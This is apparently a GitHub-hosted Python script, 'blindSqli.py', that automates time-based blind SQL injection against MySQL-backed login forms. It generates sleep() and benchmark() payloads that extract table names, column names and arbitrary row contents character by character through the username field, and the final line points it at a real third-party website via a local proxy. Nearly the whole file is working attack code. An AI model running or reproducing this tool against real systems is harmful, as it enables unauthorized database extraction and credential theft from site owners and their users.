-
Notifications
You must be signed in to change notification settings - Fork 7
/
blindSqli.py
133 lines (89 loc) · 3.66 KB
/
blindSqli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/usr/bin/python3
#coding:utf-8
import string
import requests
import time
import hackhttp
from urllib.parse import quote,unquote
asciiLetters = string.ascii_letters
hexdigits = string.hexdigits
digits = string.digits
printable = string.printable
class log():
global DEBUG
colorTable = {
"success":"\033[1;32m+\033[0m",
"error": "\033[1;31m!\033[0m",
"info":"\033[1;34m*\033[0m",
"debug":"\033[1;31mDEBUG\033[0m"
}
@staticmethod
def success(string):
print("[{}] {}".format( log.colorTable["success"],string))
@staticmethod
def error(string):
print("[{}] {}".format( log.colorTable["error"],string))
@staticmethod
def info(string):
print("[{}] {}".format( log.colorTable["info"],string))
@staticmethod
def debug(string):
if DEBUG:
print("[{}] {}".format(log.colorTable["debug"],string))
# global set
DEBUG = True
index1 = "select substr(({content}),{index},1) = '{value}'"
index2 = "select ascii(substr(({content}),{index},1)) = {value}"
errorCondition = "if(({content}),exp(800),0)"
sleepCondition1 = "if(({content}),sleep(5),0)"
sleepCondition2 = "if(({content}),benchmark(20000000,md5(1)),0)"
class SqlInject():
def __init__(self):
pass
def readTableName(self,length):
getTableName = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
strTable = asciiLetters + ","
for i in range(length):
for j in strTable:
index = index2.format( content = getTableName,index = i,value=ord(j))
# log.debug(condition)
condition = sleepCondition1.format( content = index)
log.debug(condition)
yield condition
def readColumnName(self,length,table):
getColumnName = "select group_concat(COLUMN_NAME) from COLUMNS where table_name='{table}' and table_schema=database()"
strTable = asciiLetters + ","
for i in range(length):
for j in strTable:
getColumnNameReal = getColumnName.format( table = table)
index = index2.format( content = getColumnNameReal,index = i,value=ord(j))
# log.debug(condition)
condition = sleepCondition1.format( content = index)
log.debug(condition)
yield condition
def readContent(self,start,end,line,table,column):
strTable = printable
getContent1 = "select {column} from {table} limit {line},1"
getContent2 = "select group_concat({column}) from {table}"
for i in range(start,end):
for j in strTable:
getContent = getContent1.format( column=column , table=table,line=line)
index = index2.format( content = getContent,index = i,value=ord(j))
# log.debug(condition)
condition = sleepCondition1.format( content = index)
log.debug(condition)
yield condition
def sendRequest(self,url,proxy=None):
hh = hackhttp.hackhttp()
for payload in self.readTableName(30):
data = "username=' and {p}--+&password=123456".format(p=payload)
if proxy:
log.debug(data)
code, head, body, redirect, logs = hh.http(url,post=data,proxy=proxy)
log.debug(logs["request"])
else:
code, head, body, redirect, logs = hh.http(url,post=data)
log.debug(data)
sqlInject = SqlInject()
# sqlInject.readContent(0,10,0,"mysql.user","user")
sqlInject.sendRequest("http://www.baidu.com/",("127.0.0.1",8080))